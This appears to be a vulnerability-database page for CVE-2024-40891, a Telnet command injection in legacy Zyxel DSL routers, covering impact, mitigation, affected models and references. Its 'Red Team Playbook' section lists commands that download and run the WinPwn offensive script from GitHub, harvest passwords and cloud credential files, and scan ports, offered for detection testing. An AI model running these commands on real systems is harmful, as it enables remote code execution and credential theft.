CVE-2024-40891
Overview
This vulnerability is a post-authentication command injection affecting the legacy DSL CPE Zyxel VMG4325-B10A firmware. The root cause lies in improper input validation within the management command interface accessible via Telnet, allowing injection of arbitrary OS commands. The affected component is the firmware's management command processing module, which fails to sanitize user-supplied input before execution.
Vulnerability Description
**UNSUPPORTED WHEN ASSIGNED** A post-authentication command injection vulnerability in the management commands of the legacy DSL CPE Zyxel VMG4325-B10A firmware version 1.00(AAFR.4)C0_20170615 could allow an authenticated attacker to execute operating system (OS) commands on an affected device via Telnet.
Impact
An attacker with valid credentials can execute arbitrary operating system commands on the affected device, enabling full control over the device's operating environment. This can lead to unauthorized data access, modification of device configurations, disruption of network services, and potential lateral movement within the network. The prerequisite is possession of legitimate authentication credentials for Telnet access, which may be obtained through other vulnerabilities or weak credential management.
Solution
Zyxel has published a security advisory addressing this issue for legacy DSL CPE devices, including the VMG4325-B10A firmware. Users should refer to the Zyxel Security Advisory dated 02-04-2025 at https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-command-injection-and-insecure-default-credentials-vulnerabilities-in-certain-legacy-dsl-cpe-02-04-2025 for detailed patch instructions and firmware updates. Applying the recommended firmware updates and disabling Telnet access where possible are advised as mitigation steps.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability identified in the management commands of specific Zyxel firmware versions represents a significant security concern due to its nature as a post-authentication command injection flaw. This vulnerability allows an authenticated attacker to execute arbitrary operating system commands on the affected devices via Telnet. The root cause lies in insufficient input validation within the command handling logic, which fails to properly sanitize user inputs. As a result, an attacker with valid credentials can manipulate command execution, potentially leading to unauthorized access and control over the device.
Exploitation of this vulnerability can occur through various attack vectors. An attacker must first gain authenticated access to the device, which could be achieved through credential theft, brute force attacks, or exploiting weak passwords. Once authenticated, the attacker can leverage the command injection flaw to execute arbitrary commands, which may include altering configurations, installing malicious software, or even pivoting to other devices within the network. This scenario highlights the critical need for robust authentication mechanisms and the importance of monitoring for unusual behavior post-authentication.
The real-world impact of this vulnerability can be severe, particularly for organizations relying on affected Zyxel devices for their network infrastructure. Successful exploitation could lead to data breaches, service disruptions, and unauthorized access to sensitive information. Furthermore, the ability to execute arbitrary commands can enable attackers to establish persistent access, facilitating further attacks on internal systems. The business risks associated with such incidents include financial losses, reputational damage, and potential legal ramifications stemming from non-compliance with data protection regulations.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating firmware to the latest versions is crucial, as manufacturers often release patches to address known vulnerabilities. Network segmentation can help limit the exposure of vulnerable devices, while intrusion detection systems (IDS) can monitor for suspicious activity, such as unusual command executions or unauthorized access attempts. Additionally, organizations should enforce strong password policies and consider implementing two-factor authentication to reduce the risk of unauthorized access.
In conclusion, the command injection vulnerability in the Zyxel firmware poses a significant threat to network security, particularly for organizations that utilize these devices. The potential for exploitation underscores the necessity of proactive security measures, including regular updates, strong authentication practices, and continuous monitoring. By addressing these vulnerabilities and implementing robust security protocols, organizations can better protect their networks from the risks associated with such vulnerabilities.
Affected Products (14)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Zyxel | Vmg1312-B10a Firmware | N/A |
cpe:2.3:o:zyxel:vmg1312-b10a_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg1312-B10b Firmware | N/A |
cpe:2.3:o:zyxel:vmg1312-b10b_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg1312-B10e Firmware | N/A |
cpe:2.3:o:zyxel:vmg1312-b10e_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg3312-B10a Firmware | N/A |
cpe:2.3:o:zyxel:vmg3312-b10a_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg3313-B10a Firmware | N/A |
cpe:2.3:o:zyxel:vmg3313-b10a_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg3926-B10b Firmware | N/A |
cpe:2.3:o:zyxel:vmg3926-b10b_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg4325-B10a Firmware | N/A |
cpe:2.3:o:zyxel:vmg4325-b10a_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg4380-B10a Firmware | N/A |
cpe:2.3:o:zyxel:vmg4380-b10a_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg8324-B10a Firmware | N/A |
cpe:2.3:o:zyxel:vmg8324-b10a_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg8924-B10a Firmware | N/A |
cpe:2.3:o:zyxel:vmg8924-b10a_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Sbg3300-N000 Firmware | N/A |
cpe:2.3:o:zyxel:sbg3300-n000_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Sbg3300-Nb00 Firmware | N/A |
cpe:2.3:o:zyxel:sbg3300-nb00_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Sbg3500-N000 Firmware | N/A |
cpe:2.3:o:zyxel:sbg3500-n000_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Sbg3500-Nb00 Firmware | N/A |
cpe:2.3:o:zyxel:sbg3500-nb00_firmware:-:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
55%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-40891 |
| zyxel.com |
GitHub CVE
vendor-advisory
|
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-command-injection-and-insecure-default-credentials-vulnerabilities-in-certain-legacy-dsl-cpe-02-04-2025 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-40891 |